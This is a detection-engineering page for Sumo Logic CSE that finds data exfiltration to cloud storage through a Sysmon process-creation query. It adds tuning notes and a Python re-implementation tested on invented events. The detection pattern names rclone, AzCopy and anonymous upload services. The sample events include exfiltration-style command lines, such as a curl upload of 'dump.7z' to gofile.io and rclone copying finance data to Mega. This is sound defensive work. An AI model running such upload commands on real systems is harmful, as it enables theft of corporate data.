THREAT-CloudStorage-DataExfil Sumo Logic CSE · Sumo

Detect Data Exfiltration via Cloud Storage Services in Sumo Logic CSE

Exfiltration of corporate data to attacker-controlled cloud storage is a dominant technique in double-extortion ransomware campaigns and espionage operations. Adversaries use legitimate cloud storage services and the client tooling built for them (Mega, Dropbox, OneDrive, Box, Google Drive, ShareFile; rclone and AzCopy as transfer clients) to blend exfiltration traffic with normal business activity, bypassing egress controls that only block unknown C2 addresses. Scattered Spider exfiltrated data collected from SMB file shares to Mega before ransomware deployment in 2024-2025 intrusions. Akira and Black Basta affiliates use rclone with SFTP and cloud backends. Lazarus Group favors Dropbox and Google Drive. Key indicators: rclone.exe or azcopy.exe execution against external cloud endpoints, large outbound transfers to cloud storage IP ranges, WinSCP or FileZilla used for bulk data staging, and PowerShell Invoke-WebRequest calls with cloud storage URLs. Detection opportunity exists in the staging phase (file collection and archiving before transfer) and the transfer phase (network and process telemetry). The query on this page covers the transfer phase through process-creation telemetry only; staging activity and transfer volume need their own rules.

MITRE ATT&CK

Tactic
Exfiltration

Technique
T1567.002 Exfiltration Over Web Service: Exfiltration to Cloud Storage

Sumo Detection Query

Sumo Logic CSE (Sumo)

(_sourceCategory="windows/sysmon" OR _sourceCategory="endpoint/windows/sysmon") EventCode=1
// EventCode, Image, CommandLine, ComputerName and User are assumed to be extracted
// from the Sysmon events (for example by a field extraction rule); adjust them to
// the field names your parser produces.
| where (Image matches "*rclone.exe")
    OR (Image matches "*azcopy.exe" AND (
        CommandLine matches "*blob.core.windows.net*"
        OR CommandLine matches "*file.core.windows.net*"
        OR CommandLine matches "*queue.core.windows.net*"
    ))
    OR (
        (Image matches "*powershell.exe" OR Image matches "*pwsh.exe"
            OR Image matches "*curl.exe" OR Image matches "*wscript.exe")
        AND (
            CommandLine matches "*mega.nz*"
            OR CommandLine matches "*mega.io*"
            OR CommandLine matches "*dropbox.com*"
            OR CommandLine matches "*dropboxapi.com*"
            OR CommandLine matches "*transfer.sh*"
            OR CommandLine matches "*gofile.io*"
            OR CommandLine matches "*box.com*"
            OR CommandLine matches "*box.net*"
            OR CommandLine matches "*drive.google.com*"
            OR CommandLine matches "*onedrive.live.com*"
            OR CommandLine matches "*sharefile.com*"
            OR CommandLine matches "*sendspace.com*"
            OR CommandLine matches "*filebin.net*"
            OR CommandLine matches "*anonfiles.com*"
        )
    )
// Sumo Logic has no eval or stats operators: expressions are assigned with
// "as <field>", and aggregation is count/values/max ... by <fields>.
| if(Image matches "*rclone*", "Exfil_Rclone",
    if(Image matches "*azcopy*", "Exfil_AzCopy", "Exfil_CloudStorage")) as ThreatType
| if(ThreatType = "Exfil_Rclone", 85,
    if(ThreatType = "Exfil_AzCopy", 80, 70)) as RiskScore
| count as Events, values(CommandLine) as CommandLines, max(RiskScore) as MaxRisk
    by ComputerName, User, Image, ThreatType
| sort by MaxRisk desc

Severity: high · Confidence: high

Sumo Logic log search query detecting cloud storage data exfiltration via Windows Sysmon process creation events (Event ID 1). It detects any rclone.exe execution (Scattered Spider, Akira TTP), AzCopy invocations with Azure Blob, File or Queue storage endpoints on the command line, and PowerShell, curl or wscript invocations referencing cloud storage and anonymous upload services. Results are aggregated by host, user, image and threat type to surface repeated or campaign-level activity within the search window. The query runs in Log Search or as a scheduled search; to alert from Cloud SIEM, port the predicate to a CSE match rule expression.

Data Sources

  • Sumo Logic Cloud SIEM
  • Windows Sysmon (via Sumo Logic Installed Collector)
  • Sumo Logic Endpoint Source

Required Tables

_sourceCategory=windows/sysmon

False Positives & Tuning

  • Approved IT backup or archival jobs: rclone scheduled tasks run under a service account for authorized cloud-to-cloud archival. Suppress by adding the backup service account username to a Sumo Logic lookup table and filtering it from results with a lookup join or a where clause. Note that any rclone execution fires regardless of backend, so a local-to-local rclone job also scores 85 until it is suppressed.
  • Development and test environments: AzCopy used interactively by developers targeting Azure dev/staging storage accounts. Maintain a Sumo Logic lookup of non-production storage account subdomains and exclude matching CommandLine values to avoid alert fatigue.
  • Sanctioned cloud productivity tools: corporate Dropbox Business or Box Enterprise background sync processes generating recurring process creation events. Baseline per-user event frequency with a timeslice comparison and alert only on deviations of 3x or more above the 30-day average.
  • Over-broad host globs: *box.com* and *box.net* also match any host whose name ends in box.com or box.net (xbox.com, for example), not only Box. Anchor them as *://box.com* and *.box.com* (and the .net forms) so only Box endpoints match; dropbox.com is still covered by its own pattern.
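Added example, not part of this page or of Sumo Logic's tooling: a Python re-implementation of the query's where/if predicate and its count/values/max aggregation, run over constructed Sysmon Event ID 1 records so the logic can be checked offline before the search is scheduled. Hosts, users, paths and command lines are invented. The excluded_users argument stands in for the lookup-table suppression in the tuning notes above, and tightened=True applies the anchored *box.com* / *box.net* globs from the last bullet so the xbox.com false positive disappears. Case-insensitive glob matching is an assumption about how the platform's matches operator behaves.

```python
import fnmatch
from collections import defaultdict

# Patterns copied from the query on this page.
AZURE_PATTERNS = ["*blob.core.windows.net*", "*file.core.windows.net*",
                  "*queue.core.windows.net*"]
SCRIPT_HOSTS = ["*powershell.exe", "*pwsh.exe", "*curl.exe", "*wscript.exe"]
CLOUD_URL_PATTERNS = [
    "*mega.nz*", "*mega.io*", "*dropbox.com*", "*dropboxapi.com*", "*transfer.sh*",
    "*gofile.io*", "*box.com*", "*box.net*", "*drive.google.com*",
    "*onedrive.live.com*", "*sharefile.com*", "*sendspace.com*", "*filebin.net*",
    "*anonfiles.com*",
]
RISK = {"Exfil_Rclone": 85, "Exfil_AzCopy": 80, "Exfil_CloudStorage": 70}


def _m(value, pattern):
    # Glob match, case-insensitive (assumed to mirror the platform's `matches`).
    return fnmatch.fnmatchcase(value.lower(), pattern.lower())


def cloud_patterns(tightened=False):
    """The query's URL globs; tightened=True replaces the bare *box.com* / *box.net*
    globs with forms that require a scheme or a dot directly before 'box'."""
    pats = list(CLOUD_URL_PATTERNS)
    if tightened:
        for loose in ("*box.com*", "*box.net*"):
            pats.remove(loose)
        pats += ["*://box.com*", "*.box.com*", "*://box.net*", "*.box.net*"]
    return pats


def matched_patterns(command_line, tightened=False):
    """Which cloud URL globs a command line trips; handy for explaining a hit."""
    return [p for p in cloud_patterns(tightened) if _m(command_line, p)]


def classify(event, tightened=False):
    """Mirror the query's where/if logic: ThreatType for a Sysmon EID 1 event, else None."""
    if event.get("EventCode") != 1:
        return None
    image = event.get("Image", "")
    cmd = event.get("CommandLine", "")
    if _m(image, "*rclone.exe"):
        return "Exfil_Rclone"          # any rclone run fires, whatever the backend
    if _m(image, "*azcopy.exe") and any(_m(cmd, p) for p in AZURE_PATTERNS):
        return "Exfil_AzCopy"
    if any(_m(image, p) for p in SCRIPT_HOSTS) and matched_patterns(cmd, tightened):
        return "Exfil_CloudStorage"
    return None


def run_detection(events, excluded_users=(), tightened=False):
    """Mirror count/values/max ... by ComputerName, User, Image, ThreatType and
    sort by MaxRisk desc. excluded_users stands in for the lookup-table suppression."""
    groups = defaultdict(lambda: {"Events": 0, "CommandLines": set(), "MaxRisk": 0})
    for ev in events:
        if ev.get("User") in excluded_users:
            continue
        threat = classify(ev, tightened)
        if threat is None:
            continue
        g = groups[(ev["ComputerName"], ev["User"], ev["Image"], threat)]
        g["Events"] += 1
        g["CommandLines"].add(ev["CommandLine"])
        g["MaxRisk"] = max(g["MaxRisk"], RISK[threat])
    rows = [{"ComputerName": k[0], "User": k[1], "Image": k[2], "ThreatType": k[3], **v}
            for k, v in groups.items()]
    rows.sort(key=lambda r: r["MaxRisk"], reverse=True)   # stable: ties keep arrival order
    return rows


# Constructed Sysmon Event ID 1 records (not real telemetry), using the field names
# the query keys on. Hosts, users, paths and command lines are invented.
SAMPLE_EVENTS = [
    {"EventCode": 1, "ComputerName": "FS01", "User": "CORP\\jdoe",
     "Image": "C:\\Users\\jdoe\\AppData\\Local\\Temp\\rclone.exe",
     "CommandLine": "rclone.exe copy D:\\Finance mega:staging --transfers 8"},
    {"EventCode": 1, "ComputerName": "FS01", "User": "CORP\\jdoe",
     "Image": "C:\\Users\\jdoe\\AppData\\Local\\Temp\\rclone.exe",
     "CommandLine": "rclone.exe sync D:\\HR mega:staging --transfers 8"},
    {"EventCode": 1, "ComputerName": "BK01", "User": "CORP\\svc-backup",   # sanctioned archival job
     "Image": "C:\\Program Files\\rclone\\rclone.exe",
     "CommandLine": "rclone.exe copy E:\\Archive s3-archive:corp-archive"},
    {"EventCode": 1, "ComputerName": "DEV07", "User": "CORP\\asmith",
     "Image": "C:\\Tools\\azcopy.exe",
     "CommandLine": "azcopy copy C:\\build https://devstg01.blob.core.windows.net/artifacts --recursive"},
    {"EventCode": 1, "ComputerName": "WS22", "User": "CORP\\bjones",
     "Image": "C:\\Windows\\System32\\curl.exe",
     "CommandLine": "curl.exe -T dump.7z https://store1.gofile.io/uploadFile"},
    {"EventCode": 1, "ComputerName": "WS09", "User": "CORP\\kid",          # benign; trips *box.com*
     "Image": "C:\\Windows\\System32\\curl.exe",
     "CommandLine": "curl.exe -O https://www.xbox.com/en-US/games"},
    {"EventCode": 3, "ComputerName": "WS22", "User": "CORP\\bjones",       # network event, not EID 1
     "Image": "C:\\Windows\\System32\\curl.exe",
     "CommandLine": "curl.exe -T dump.7z https://store1.gofile.io/uploadFile"},
    {"EventCode": 1, "ComputerName": "WS30", "User": "CORP\\mlee",         # internal URL, no match
     "Image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
     "CommandLine": "powershell.exe Invoke-WebRequest https://intranet.corp.example/report.pdf"},
]

if __name__ == "__main__":
    for row in run_detection(SAMPLE_EVENTS):
        print(row["MaxRisk"], row["ThreatType"], row["ComputerName"], row["User"], row["Events"])
    print("xbox.com hit explained by:", matched_patterns(SAMPLE_EVENTS[5]["CommandLine"]))
```

Running it as-is produces five rows (the two FS01 rclone events collapse into one row with Events = 2 and both command lines), including the xbox.com row at risk 70; passing excluded_users=("CORP\\svc-backup",) drops the archival job, and tightened=True drops the xbox.com row while the gofile.io upload still matches.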

Testing Methodology

Validate this detection against one adversary technique from Atomic Red Team (T1567.002, Exfiltration to Cloud Storage). The test below lists the behaviour to exercise and the telemetry you should expect to see.

  1. Test 1: Simulate Cloud Exfiltration via rclone to Mega

    Expected signal: Sysmon Event ID 1: rclone.exe with a copy command targeting a Mega remote. Sysmon Event ID 3: network connection to mega.co.nz or api.mega.co.nz. Only the Event ID 1 signal is consumed by the query above; the Event ID 3 connection confirms that data actually left the host and belongs in the investigation, not in this rule.
